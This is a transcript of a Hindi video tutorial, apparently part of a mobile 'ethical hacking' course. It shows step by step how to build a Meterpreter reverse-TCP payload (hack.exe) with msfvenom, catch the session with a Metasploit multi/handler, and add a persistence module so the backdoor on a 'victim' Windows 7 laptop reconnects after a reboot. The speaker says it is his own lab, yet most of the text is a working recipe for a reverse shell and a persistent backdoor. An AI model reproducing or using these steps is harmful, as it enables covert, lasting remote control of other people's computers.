अस्सलाम वालेकुम ऑल व्यूअर्स, वेलकम टू आरबी एजुकेशन हब। मोबाइल से एथिकल हैकिंग के कोर्स में हम लोगों का चल रहा है पेलोड। और पेलोड में आज मैं आप लोगों को बताऊंगा कि परसिस्टेंट पेलोड कैसे बनाते हैं। इसमें क्या होता है कि पीसी रीस्टार्ट हो जाए उसके बाद भी हम लोगों को कनेक्शन मिल जाता है। मतलब एक तरीके का विक्टिम के मशीन पर हम लोग एक बैक डोर जो है वो क्रिएट कर लेते हैं। कंप्यूटर बंद हो जाए, बाद में जब दोबारा वो इंटरनेट से कनेक्ट होगा तो खुद ब खुद हम लोगों से वो कनेक्शन बना लेगा। तो ऐसा पेलोड कैसे बनाते हैं, चलिए देखते हैं। तो यहाँ पर मैं लिखता हूँ MSF विनम -P विंडोज मीटरप्रेटर और रिवर्स _TCP। ये हम लोगों का पेलोड है। अब यहाँ पर मैं लिखूंगा एल होस्ट और इज इक्वल टू एल होस्ट में क्या आएगा, हम लोगों का आईपी आएगा। मैं यहाँ पर एक न्यू टर्मिनल लेता हूँ और यहाँ से आईपी पता कर लेता हूँ कि मेरा जो आईपी है वो क्या है। तो यहाँ मैं लिखूंगा इफ कॉन्फिग। तो देखिए ये जो आईपी है ये मेरे मोबाइल का आईपी है। यही आईपी हम लोगों को एल होस्ट में डालना होता है। तो ये आईपी मैं यहाँ पे डालता हूँ और आगे लिखता हूँ एल पॉट। यहाँ पे मुझे पॉट देना है, तो मैं 4444 का यूज़ कर रहा हूँ। आप यहाँ पे कोई भी पॉट दे सकते हैं। और यहाँ पर मैं फॉर्मेट के लिए यूज़ कर रहा हूँ EXE। ये फाइल फॉर्मेट रहेगा। और उसके बाद मैं यहाँ लिखता हूँ -O। फाइल का नाम क्या रहेगा, तो फाइल का नाम हम लोग hack.exe विंडोज़ के लिए बना रहे हैं इसलिए इस तरह। और यहाँ पे मैं कर देता हूँ एंटर। देखिए पेलोड जो है ये बन चुका है। मैं यहाँ ls करता हूँ तो आप देखिए यहाँ पर ये जो है तो पेलोड बन चुका है। अब हम लोग इसे क्या करते हैं, SD कार्ड में पलटाते हैं और फिर मशीन पे इंस्टॉल करेंगे। विक्टिम मशीन पर मेरे पास एक लैपटॉप है, उसके ऊपर हम लोग इसे इंस्टॉल करेंगे। तो अभी मैं क्या करता हूँ, इसे SD कार्ड में पलटा लेता हूँ। तो मैं यहाँ लिखता हूँ MV और SD कार्ड में एक फ़ोल्डर है पेलोड करके, तो उस फोल्डर में हम लोग इसे पलटा लेते हैं। अब मैं यहाँ पे क्या करता हूँ कि MSF कंसोल जो है इसे स्टार्ट करता हूँ और पहले यहाँ पे मैं लिसनर जो है उसे ऑन कर लेता हूँ। उसके बाद उस पेलोड को हम लोग विक्टिम के मशीन पे इंस्टॉल करेंगे और फिर हम लोग बैकडोर बनाएंगे। अभी ये नॉर्मल पेलोड है। जब ये पेलोड विक्टिम के मशीन पे रन हो जाएगा तब मैं आप लोगों को बैकडोर बना के बताऊँगा। तो पहले हम लोग यहाँ पे लिसनर को ऑन कर लेते हैं। देखिए ये मेटा एक्सप्लॉइट जो है ये रन हो चुका है। अब मैं यहाँ पर लिखता हूँ यूज़ एक्सप्लॉइट मल्टी हैंडलर और एंटर करता हूँ। अब यहाँ पे मैं देख लेता हूँ शो ऑप्शन करके कि क्या क्या यहाँ पे हम लोगों को रिक्वायर है। तो यहाँ पे देखिए पॉड जो है तो ये सेट है 4444। सिर्फ हम लोगों को एल होस्ट जो है इसे सेट करना है। तो मैं यहाँ पे लिखता हूँ सेट एल होस्ट। एल होस्ट क्या था हम लोगों का, ये था। तो इसी को यहाँ से कॉपी करता हूँ और यहाँ पर मैं इसे पेस्ट कर देता हूँ, देन एंटर। अब हम लोगों को क्या करना है, पेलोड सेट करना है। तो यहाँ मैं लिखता हूँ सेट पेलोड। पेलोड क्या था,
विंडोज़ मेटरप्रेटर रिवर्स अंडरस्कोर टीसीपी, ये हम लोगों का पेलोड है। अब यहाँ पर मैं एक्सप्लॉइट जो है उसे रन कर देता हूँ, एक्सप्लॉइट को, और फिर हम लोग जो पेलोड है उसे विक्टिम के मशीन पे रन करेंगे। देखिए ये जो मेरी जो तो लैब है, खुद की बनाई हुई लैब है, उसमें ये विंडोज़ 7 जो है ये रनिंग है। और मैं इसे ओपन करता हूँ। यहाँ पे देखिए hack.exe जो हम लोगों ने पेलोड जो है वो क्रिएट किया है। तो मैं अब इसे जो है तो यहाँ पे रन करता हूँ, और यहाँ पे हम लोगों का जो लिसनर है ये भी ऑन है। ये देखिए यहाँ पर हम लोगों को मेटरप्रेटर का सेशन मिल चुका है। अब मैं यहाँ पर अगर लिखता हूँ सिस इन्फो और एंटर करता हूँ, तो देखिए ये रिजवान पीसी और विंडोज़ 7 ये सब बता रहे हैं। तो यहाँ पे हम लोग देखते हैं, ये देखिए रिजवान पीसी। देखा आपने। तो अब मैं यहाँ पे क्या करता हूँ, आपको एक स्क्रीनशॉट भी लेके बता देता हूँ। ये स्क्रीनशॉट आ गया, M0 करके फाइल है। तो मैं दिखा देता हूँ एक दफ़े। ls ये फाइल है, ये जो है तो अभी स्क्रीनशॉट लिया है ये नाम से। तो मैं इसे यहाँ से मूव करवा देता हूँ। पेलोड में डालते हैं, SD कार्ड में चल के देखते हैं हम लोग। ये देखिए ये स्क्रीनशॉट इसने लिया है, ये हम लोगों का पेलोड रखा हुआ है वहाँ पे, बिल्कुल सही ये स्क्रीनशॉट है। अब हम लोग इसमें बैकडोर, अब हम लोग यहाँ पे क्या करते हैं कि बैकडोर जो है वो क्रिएट करते हैं। तो देखिए अभी हम लोग मेटरप्रेटर में हैं, तो यहाँ से हम लोगों को इसे बैकग्राउंड में डालना है। तो मैं यहाँ लिखता हूँ बैकग्राउंड और एंटर करता हूँ, तो वो सेशन जो है बैकग्राउंड में है। अब मैं यहाँ पे लिखता हूँ यूज़ एक्सप्लॉइट विंडोज़ लोकल परसिस्टेंस, इस तरह लिखना है और एंटर करते हैं। अब हम लोग यहाँ पर जो है तो सेट सेशन 1 और एंटर करते हैं। उसके बाद मैं लिखता हूँ मैं यहाँ पे लिखता हूँ सेट एल होस्ट, तो अपना IP डालेंगे 192.0.0.4। एक दफ़े चेक कर लेते हैं IP। जी बिल्कुल सही है IP, और एंटर करते हैं। अब यहाँ पे हम लोग क्या करते हैं, सेट एल पोर्ट क्या था 4444 और एंटर करते हैं। अब यहाँ पे सिंपली मैं लिखता हूँ रन और एंटर करता हूँ।
देखिए अब यहाँ पर क्या हुआ है कि हम लोगों को बैकडोर जो है वो क्रिएट हो चुका है। बैकडोर जो है वो विंडोज़ पीसी में इंस्टॉल हो चुका है। अब हम लोग क्या करते हैं, विंडोज़ पीसी को एक मरतबा रीस्टार्ट करके देखते हैं और उसके बाद हम लोग यहाँ पर एक मरतबा लिसनर ऑन कर लेते हैं। पहले वो जो टर्मिनल था वो बहुत ज़्यादा हैंग हो रहा था, तो मैं दूसरा टर्मिनल ओपन करके यहाँ पर मेटा एक्सप्लॉइट को रन कर लिया हूँ। अब मैं यहाँ पे सिंपली क्या करता हूँ, लिखता हूँ यूज़ एक्सप्लॉइट मल्टी हैंडलर और देख लेते हैं यहाँ पे शो ऑप्शन करके। पॉट सेट है, सिर्फ एल होस्ट को सेट करना है। यहाँ लिखता हूँ सेट एल होस्ट 192.0.0.4 और पेलोड जो है वो सेट कर लेते हैं। सेट पेलोड विंडोज़ मेटरप्रेटर रिवर्स अंडरस्कोर TCP। पेलोड भी सेट हो गया है। अब मैं यहाँ पे सिंपली लिख देता हूँ एक्सप्लॉइट। अब हम लोग क्या करते हैं, पीसी को रीस्टार्ट करके देखते हैं। अगर पीसी रीस्टार्ट होने बाद भी हम लोगों को कनेक्शन मिल जाता है तो मतलब हमारा जो बैकडोर है वो सक्सेसफुली क्रिएट हो चुका है। देखिए यहाँ पर हम लोगों को सेशन तो मिल चुका है, लेकिन अब मैं मेरा जो लैपटॉप है इसे एक मरतबा रीस्टार्ट करता हूँ। ये मैंने रीस्टार्ट किया है पीसी को। अब मैं यहाँ पे सीस इन्फो लिख कर देखता हूँ। देखिए यहाँ पे खुद ब खुद क्लोज आ गया। ये देख सकते हैं यहाँ पे हम लोगों को क्लोज दे रहा है क्योंकि पीसी जो है रीस्टार्ट हो गया है। अब रीस्टार्ट होने बाद मैं यहाँ पे दोबारा कनेक्शन बनाऊंगा। अगर कनेक्शन सक्सेसफुली बन गया तो मतलब हम लोगों का परसिस्टेंट पेलोड जो है वो काम कर गया। अभी देखिए पीसी जो है ये ऑन हो गया है और कनेक्शन दोबारा से हम लोग बनाते हैं। मैं यहाँ पे सिंपली लिखा हूँ एक्सप्लॉइट और मैं यहाँ पे एंटर करता हूँ और देखते हैं हम लोगों का कनेक्शन अब दोबारा बनता है या नहीं। वाओ, ये देखिए बिल्कुल सक्सेसफुली हम लोगों का काम हो गया। अभी मैंने कुछ भी नहीं किया, पीसी आपके सामने है। तो इस तरीके से आप बैकडोर क्रिएट कर सकते हैं विंडोज़ पीसी में। तो इस वीडियो में इतना ही, फिर मिलेंगे। अल्लाह हाफिज़।